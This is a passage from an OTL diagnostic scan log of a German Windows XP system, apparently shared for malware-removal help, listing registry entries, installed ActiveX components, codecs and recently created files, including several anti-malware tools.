hxxp://download.microsoft.com/download/e/2/f/e2fcec4b-6c8b-48b7-adab-ab9c403a978f/wvc1dmo.cab (Reg Error: Key error.) O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} hxxp://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1276015979588 (WUWebControl Class) O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} hxxp://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1276015904580 (MUWebControl Class) O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_06-windows-i586.cab (Java Plug-in 1.6.0_06) O16 - DPF: {CAFEEFAC-0016-0000-0006-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_06-windows-i586.cab (Java Plug-in 1.6.0_06) O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_06-windows-i586.cab (Java Plug-in 1.6.0_06) O18 - Protocol\Handler\http\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation) O18 - Protocol\Handler\http\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation) O18 - Protocol\Handler\https\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation) O18 - Protocol\Handler\https\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation) O18 - Protocol\Handler\ipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation) O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation) O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation) O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation) O20 - Winlogon\Notify\igfxcui: DllName - igfxsrvc.dll - C:\WINDOWS\System32\igfxsrvc.dll (Intel Corporation) O24 - Desktop Components:0 (Die derzeitige Homepage) - About:Home O24 - Desktop WallPaper: C:\Dokumente und Einstellungen\***\Anwendungsdaten\Opera\Opera\profile\skin\1-4_step_in_eternity.bmp O24 - Desktop BackupWallPaper: C:\Dokumente und Einstellungen\***\Anwendungsdaten\Opera\Opera\profile\skin\1-4_step_in_eternity.bmp O32 - HKLM CDRom: AutoRun - 1 O32 - AutoRun File - [2008.08.27 00:40:34 | 000,000,000 | ---- | M] () - C:\AUTOEXEC.BAT -- [ NTFS ] O34 - HKLM BootExecute: (autocheck autochk *) - File not found O34 - HKLM BootExecute: (sprestrt) - C:\WINDOWS\System32\sprestrt.exe (Microsoft Corporation) O35 - HKLM\..comfile [open] -- "%1" %* O35 - HKLM\..exefile [open] -- "%1" %* O37 - HKLM\...com [@ = ComFile] -- "%1" %* O37 - HKLM\...exe [@ = exefile] -- "%1" %* NetSvcs: 6to4 - File not found NetSvcs: Ias - C:\WINDOWS\system32\ias [2010.06.08 17:01:38 | 000,000,000 | ---D | M] NetSvcs: Iprip - File not found NetSvcs: Irmon - File not found NetSvcs: NWCWorkstation - File not found NetSvcs: Nwsapagent - File not found NetSvcs: WmdmPmSp - File not found MsConfig - State: "system.ini" - 0 MsConfig - State: "win.ini" - 0 MsConfig - State: "bootini" - 0 MsConfig - State: "services" - 0 MsConfig - State: "startup" - 0 SafeBootMin: Base - Driver Group SafeBootMin: Boot Bus Extender - Driver Group SafeBootMin: Boot file system - Driver Group SafeBootMin: File system - Driver Group SafeBootMin: Filter - Driver Group SafeBootMin: PCI Configuration - Driver Group SafeBootMin: PNP Filter - Driver Group SafeBootMin: Primary disk - Driver Group SafeBootMin: SCSI Class - Driver Group SafeBootMin: sermouse.sys - Driver SafeBootMin: System Bus Extender - Driver Group SafeBootMin: vga.sys - Driver SafeBootMin: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers SafeBootMin: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive SafeBootMin: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive SafeBootMin: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller SafeBootMin: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc SafeBootMin: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard SafeBootMin: {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse SafeBootMin: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters SafeBootMin: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter SafeBootMin: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System SafeBootMin: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive SafeBootMin: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume SafeBootMin: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices SafeBootNet: Base - Driver Group SafeBootNet: Boot Bus Extender - Driver Group SafeBootNet: Boot file system - Driver Group SafeBootNet: File system - Driver Group SafeBootNet: Filter - Driver Group SafeBootNet: NDIS Wrapper - Driver Group SafeBootNet: NetBIOSGroup - Driver Group SafeBootNet: NetDDEGroup - Driver Group SafeBootNet: Network - Driver Group SafeBootNet: NetworkProvider - Driver Group SafeBootNet: PCI Configuration - Driver Group SafeBootNet: PNP Filter - Driver Group SafeBootNet: PNP_TDI - Driver Group SafeBootNet: Primary disk - Driver Group SafeBootNet: SCSI Class - Driver Group SafeBootNet: sermouse.sys - Driver SafeBootNet: Streams Drivers - Driver Group SafeBootNet: System Bus Extender - Driver Group SafeBootNet: TDI - Driver Group SafeBootNet: vga.sys - Driver SafeBootNet: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers SafeBootNet: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive SafeBootNet: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive SafeBootNet: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller SafeBootNet: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc SafeBootNet: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard SafeBootNet: {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse SafeBootNet: {4D36E972-E325-11CE-BFC1-08002BE10318} - Net SafeBootNet: {4D36E973-E325-11CE-BFC1-08002BE10318} - NetClient SafeBootNet: {4D36E974-E325-11CE-BFC1-08002BE10318} - NetService SafeBootNet: {4D36E975-E325-11CE-BFC1-08002BE10318} - NetTrans SafeBootNet: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters SafeBootNet: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter SafeBootNet: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System SafeBootNet: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive SafeBootNet: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume SafeBootNet: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices ActiveX: {08B0E5C0-4FCB-11CF-AAA5-00401C608500} - Java (Sun) ActiveX: {10072CEC-8CC1-11D1-986E-00A0C955B42F} - Vektorgrafik-Rendering (VML) ActiveX: {10880D85-AAD9-4558-ABDC-2AB1552D831F} - "C:\Programme\Gemeinsame Dateien\LightScribe\LSRunOnce.exe" ActiveX: {2179C5D3-EBFF-11CF-B6FD-00AA00B4E220} - Microsoft NetShow Player ActiveX: {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 6.4 ActiveX: {233C1507-6A77-46A4-9443-F871F945D258} - Adobe Shockwave Director 11.0 ActiveX: {283807B5-2C60-11D0-A31D-00AA00B92C03} - DirectAnimation ActiveX: {2A202491-F00D-11cf-87CC-0020AFEECF20} - Adobe Shockwave Director 11.0 ActiveX: {2A3320D6-C805-4280-B423-B665BDE33D8F} - Microsoft .NET Framework 1.1 Security Update (KB979906) ActiveX: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll ActiveX: {36f8ec70-c29a-11d1-b5c7-0000f8051515} - Dynamic HTML-Datenbindung für Java ActiveX: {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack ActiveX: {3bf42070-b3b1-11d1-b5c5-0000f8051515} - Uniscribe ActiveX: {411EDCF7-755D-414E-A74B-3DCD6583F589} - Microsoft .NET Framework 1.1 Service Pack 1 (KB867460) ActiveX: {4278c270-a269-11d1-b5bf-0000f8051515} - Erweitertes Authoring ActiveX: {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - "%ProgramFiles%\Outlook Express\setup50.exe" /APP:OE /CALLER:WINNT /user /install ActiveX: {44BBA842-CC51-11CF-AAFA-00AA00B6015B} - rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\msnetmtg.inf,NetMtg.Install.PerUser.NT ActiveX: {44BBA848-CC51-11CF-AAFA-00AA00B6015C} - DirectShow ActiveX: {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx ActiveX: {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help ActiveX: {4f216970-c90c-11d1-b5c7-0000f8051515} - DirectAnimation Java Classes ActiveX: {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.7 ActiveX: {5945c046-1e7d-11d1-bc44-00c04fd912be} - rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\msmsgs.inf,BLC.QuietInstall.PerUser ActiveX: {5A8D6EE0-3E18-11D0-821E-444553540000} - ICW ActiveX: {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools ActiveX: {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements ActiveX: {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media Player ActiveX: {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access ActiveX: {7790769C-0471-11d2-AF11-00C04FA35D02} - "%ProgramFiles%\Outlook Express\setup50.exe" /APP:WAB /CALLER:WINNT /user /install ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4340} - regsvr32.exe /s /n /i:U shell32.dll ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4383} - C:\WINDOWS\system32\ie4uinit.exe -BaseSettings ActiveX: {89B4C1CD-B018-4511-B0A1-5476DBF70820} - c:\WINDOWS\system32\Rundll32.exe c:\WINDOWS\system32\mscories.dll,Install ActiveX: {9309DD7E-EBFE-3C95-8B47-30D3A012F606} - .NET Framework ActiveX: {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding ActiveX: {ACC563BC-4266-43f0-B6ED-9D38C4202C7E} - ActiveX: {B508B3F1-A24A-32C0-B310-85786919EF28} - .NET Framework ActiveX: {C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F} - .NET Framework ActiveX: {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts ActiveX: {CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1} - .NET Framework ActiveX: {CC2A9BA0-3BDD-11D0-821E-444553540000} - Taskplaner ActiveX: {CDD7975E-60F8-41d5-8149-19E51D6F71D0} - Windows Movie Maker v2.1 ActiveX: {D27CDB6E-AE6D-11cf-96B8-444553540000} - Macromedia Shockwave Flash ActiveX: {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help ActiveX: {E78BFA60-5393-4C38-82AB-E8019E464EB4} - .NET Framework ActiveX: {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface ActiveX: {EF289A85-8E57-408d-BE47-73B55609861A} - RootsUpdate ActiveX: <{12d0ed0d-0ee0-4f90-8827-78cefb8f4988} - C:\WINDOWS\system32\ieudinit.exe ActiveX: >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - C:\WINDOWS\inf\unregmp2.exe /ShowWMP ActiveX: >{26923b43-4d38-484f-9b9e-de460746276c} - C:\WINDOWS\system32\ie4uinit.exe -UserIconConfig ActiveX: >{60B49E34-C7CC-11D0-8953-00A0C90347FF}MICROS - RunDLL32 IEDKCS32.DLL,BrandIE4 SIGNUP ActiveX: >{881dd1c5-3dcf-431b-b061-f3f88e8be88a} - %systemroot%\system32\shmgrate.exe OCInstallUserConfigOE ActiveX: Microsoft Base Smart Card Crypto Provider Package - Drivers32: msacm.iac2 - C:\WINDOWS\system32\iac25_32.ax (Intel Corporation) Drivers32: msacm.imc - C:\WINDOWS\System32\IMC32.acm (Intel Corporation) Drivers32: msacm.l3acm - C:\WINDOWS\system32\l3codeca.acm (Fraunhofer Institut Integrierte Schaltungen IIS) Drivers32: msacm.l3codecp - C:\WINDOWS\System32\l3codecp.acm (Fraunhofer Institut Integrierte Schaltungen IIS) Drivers32: msacm.sl_anet - C:\WINDOWS\System32\sl_anet.acm (Sipro Lab Telecom Inc.) Drivers32: msacm.trspch - C:\WINDOWS\System32\tssoft32.acm (DSP GROUP, INC.) Drivers32: vidc.cvid - C:\WINDOWS\System32\iccvid.dll (Radius Inc.) Drivers32: VIDC.i263 - C:\WINDOWS\System32\I263_32.drv (Intel Corporation) Drivers32: vidc.iv31 - C:\WINDOWS\System32\ir32_32.dll () Drivers32: vidc.iv32 - C:\WINDOWS\System32\ir32_32.dll () Drivers32: VIDC.IV40 - C:\WINDOWS\System32\ir41_32.ax (Intel Corporation) Drivers32: vidc.iv41 - C:\WINDOWS\System32\ir41_32.ax (Intel Corporation) Drivers32: vidc.iv50 - C:\WINDOWS\System32\ir50_32.dll (Intel Corporation) Drivers32: vidc.MP42 - Mpg4c32.dll File not found Drivers32: vidc.MP43 - Mpg4c32.dll File not found Drivers32: vidc.MPG4 - Mpg4c32.dll File not found Drivers32: VIDC.VP70 - C:\WINDOWS\System32\vp7vfw.dll (On2.com) Drivers32: VIDC.wmv3 - C:\WINDOWS\System32\WMV9VCM.dll (Microsoft Corporation) Drivers32: vidc.XVID - C:\WINDOWS\System32\xvidvfw.dll () CREATERESTOREPOINT Restore point Set: OTL Restore Point (16902109354000384) ========== Files/Folders - Created Within 60 Days ========== [2010.07.03 17:16:25 | 000,574,464 | ---- | C] (OldTimer Tools) -- C:\Dokumente und Einstellungen\***\Desktop\OTL.exe [2010.06.28 23:17:57 | 000,000,000 | -HSD | C] -- C:\RECYCLER [2010.06.28 23:16:02 | 000,000,000 | ---D | C] -- C:\WINDOWS\temp [2010.06.28 13:40:27 | 000,000,000 | ---D | C] -- C:\Programme\Secunia [2010.06.27 20:55:11 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\LocalService\Lokale Einstellungen\Anwendungsdaten\ESET [2010.06.25 23:58:12 | 000,000,000 | ---D | C] -- C:\Programme\xerox [2010.06.25 23:58:11 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\xircom [2010.06.25 23:58:03 | 000,000,000 | ---D | C] -- C:\Programme\microsoft frontpage [2010.06.25 23:47:40 | 000,000,000 | RHSD | C] -- C:\cmdcons [2010.06.25 23:44:12 | 000,212,480 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWXCACLS.exe [2010.06.25 23:44:12 | 000,161,792 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWREG.exe [2010.06.25 23:44:12 | 000,136,704 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWSC.exe [2010.06.25 23:44:12 | 000,031,232 | ---- | C] (NirSoft) -- C:\WINDOWS\NIRCMD.exe [2010.06.25 23:44:01 | 000,000,000 | ---D | C] -- C:\WINDOWS\ERDNT [2010.06.25 23:43:20 | 000,000,000 | ---D | C] -- C:\Qoobox [2010.06.20 21:01:28 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\***\Anwendungsdaten\Malwarebytes [2010.06.20 21:01:15 | 000,038,224 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbamswissarmy.sys [2010.06.20 21:01:14 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Malwarebytes [2010.06.20 21:01:13 | 000,020,952 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\System32\drivers\mbam.sys [2010.06.20 21:01:11 | 000,000,000 | ---D | C] -- C:\Programme\Malwarebytes' Anti-Malware [2010.06.19 20:33:32 | 000,000,000 | ---D | C] -- C:\Programme\Sophos [2010.06.19 20:08:52 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\***\Eigene Dateien\Meine empfangenen Dateien [2010.06.18 13:17:29 | 000,000,000 | ---D | C] -- C:\Programme\Trend Micro [2010.06.15 02:28:04 | 000,000,000 | ---D | C] -- C:\Kaspersky Rescue Disk 10.0 [2010.06.14 16:00:27 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\***\Lokale Einstellungen\Anwendungsdaten\ESET [2010.06.14 13:51:56 | 000,000,000 | ---D | C] -- C:\Programme\ESET [2010.06.14 13:51:56 | 000,000,000 | ---D | C] -- C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\ESET [2010.06.11 12:13:33 | 000,285,696 | ---- | C] (Adobe Systems Incorporated) -- C:\WINDOWS\System32\dllcache\atmfd.dll [2010.06.11 12:13:26 | 000,075,776 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\strmfilt.dll [2010.06.11 12:13:26 | 000,025,088 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\httpapi.dll [2010.06.11 12:13:25 | 000,265,728 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\http.sys [2010.06.11 00:20:31 | 000,000,000 | ---D | C] -- C:\Meine Webseiten [2010.06.11 00:16:51 | 000,000,000 | ---D | C] -- C:\Programme\WinHTTrack [2010.06.08 19:10:18 | 000,691,712 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\inetcomm.dll [2010.06.08 19:09:59 | 000,430,080 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\vbscript.dll [2010.06.08 19:09:25 | 000,100,864 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\6to4svc.dll [2010.06.08 19:09:00 | 000,457,216 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\mrxsmb.sys [2010.06.08 19:08:50 | 003,558,912 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\moviemk.exe [2010.06.08 19:08:35 | 000,346,624 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\mspaint.exe [2010.06.08 19:08:25 | 000,353,792 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\srv.sys [2010.06.08 19:08:17 | 000,085,504 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\avifil32.dll [2010.06.08 19:08:17 | 000,048,128 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\iyuv_32.dll [2010.06.08 19:08:17 | 000,028,672 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msvidc32.dll [2010.06.08 19:08:17 | 000,011,264 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msrle32.dll [2010.06.08 19:08:17 | 000,008,704 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\tsbyuv.dll [2010.06.08 19:07:59 | 001,297,408 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\quartz.dll [2010.06.08 19:07:59 | 000,017,920 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msyuv.dll [2010.06.08 19:07:44 | 000,033,280 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\csrsrv.dll [2010.06.08 19:07:33 | 000,474,624 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\shlwapi.dll [2010.06.08 19:07:22 | 000,477,696 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\mshtmled.dll [2010.06.08 19:07:21 | 000,671,232 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\mstime.dll [2010.06.08 19:07:21 | 000,214,528 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\dxtrans.dll [2010.06.08 19:07:21 | 000,193,024 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msrating.dll [2010.06.08 19:07:21 | 000,193,024 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\iepeers.dll [2010.06.08 19:07:21 | 000,161,792 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\ieakui.dll [2010.06.08 19:07:21 | 000,153,088 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\ieakeng.dll [2010.06.08 19:07:21 | 000,102,912 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\occache.dll [2010.06.08 19:07:21 | 000,052,224 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msfeedsbs.dll [2010.06.08 19:07:21 | 000,017,408 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\corpol.dll [2010.06.08 19:07:20 | 001,040,384 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\ieframe.dll.mui [2010.06.08 19:07:20 | 000,388,608 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\iedkcs32.dll [2010.06.08 19:07:20 | 000,347,136 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\dxtmsft.dll [2010.06.08 19:07:20 | 000,233,472 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\webcheck.dll [2010.06.08 19:07:20 | 000,230,400 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\ieaksie.dll [2010.06.08 19:07:20 | 000,132,608 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\extmgr.dll [2010.06.08 19:07:20 | 000,044,544 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\pngfilt.dll [2010.06.08 19:07:20 | 000,044,544 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\iernonce.dll [2010.06.08 19:07:19 | 002,452,872 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\ieapfltr.dat [2010.06.08 19:07:19 | 000,841,216 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\wininet.dll [2010.06.08 19:07:19 | 000,268,288 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\iertutil.dll [2010.06.08 19:07:18 | 000,634,648 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\iexplore.exe [2010.06.08 19:07:18 | 000,459,264 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msfeeds.dll [2010.06.08 19:07:18 | 000,380,928 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\ieapfltr.dll [2010.06.08 19:07:18 | 000,124,928 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\advpack.dll [2010.06.08 19:07:18 | 000,105,984 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\url.dll [2010.06.08 19:07:18 | 000,078,336 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\ieencode.dll [2010.06.08 19:07:18 | 000,070,656 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\ie4uinit.exe [2010.06.08 19:07:18 | 000,063,488 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\icardie.dll [2010.06.08 19:07:18 | 000,027,648 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\jsproxy.dll [2010.06.08 19:07:18 | 000,013,824 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\ieudinit.exe [2010.06.08 19:07:17 | 001,830,912 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\inetcpl.cpl [2010.06.08 19:07:17 | 001,171,968 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\urlmon.dll [2010.06.08 19:07:16 | 006,071,296 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\ieframe.dll [2010.06.08 19:06:17 | 000,119,808 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\t2embed.dll [2010.06.08 19:06:17 | 000,081,920 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\fontsub.dll [2010.06.08 19:05:49 | 000,271,360 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\oakley.dll [2010.06.08 19:05:33 | 000,079,872 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\raschap.dll [2010.06.08 19:04:03 | 000,301,568 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\kerberos.dll [2010.06.08 19:04:03 | 000,054,272 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\wdigest.dll [2010.06.08 19:04:02 | 000,136,704 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msv1_0.dll [2010.06.08 19:04:01 | 000,092,928 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\ksecdd.sys [2010.06.08 19:03:43 | 001,441,792 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\query.dll [2010.06.08 19:03:18 | 000,247,326 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\strmdll.dll [2010.06.08 19:03:06 | 000,058,880 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msasn1.dll [2010.06.08 19:02:08 | 000,512,000 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\jscript.dll [2010.06.08 19:01:49 | 000,134,144 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\wkssvc.dll [2010.06.08 19:01:36 | 000,206,336 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\mswebdvd.dll [2010.06.08 19:01:23 | 000,082,944 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\tlntsess.exe [2010.06.08 19:01:23 | 000,078,848 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\telnet.exe [2010.06.08 19:01:09 | 000,058,880 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\atl.dll [2010.06.08 18:59:45 | 000,585,216 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\rpcrt4.dll [2010.06.08 18:59:33 | 000,348,672 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\localspl.dll [2010.06.08 18:59:22 | 001,063,424 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\kernel32.dll [2010.06.08 18:59:22 | 000,056,832 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\secur32.dll [2010.06.08 18:59:11 | 000,354,816 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\winhttp.dll [2010.06.08 18:59:00 | 000,956,928 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msdtctm.dll [2010.06.08 18:59:00 | 000,161,792 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msdtcuiu.dll [2010.06.08 18:59:00 | 000,091,648 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\mtxoci.dll [2010.06.08 18:59:00 | 000,066,560 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\mtxclu.dll [2010.06.08 18:59:00 | 000,058,880 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\msdtclog.dll [2010.06.08 18:58:45 | 000,737,792 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\lsasrv.dll [2010.06.08 18:58:44 | 002,148,864 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\ntkrnlmp.exe [2010.06.08 18:58:44 | 002,069,248 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\ntkrnlpa.exe [2010.06.08 18:58:43 | 002,027,008 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\ntkrpamp.exe [2010.06.08 18:58:04 | 008,502,272 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\shell32.dll [2010.06.08 18:57:42 | 000,147,456 | ---- | C] (Microsoft Corporation) -- 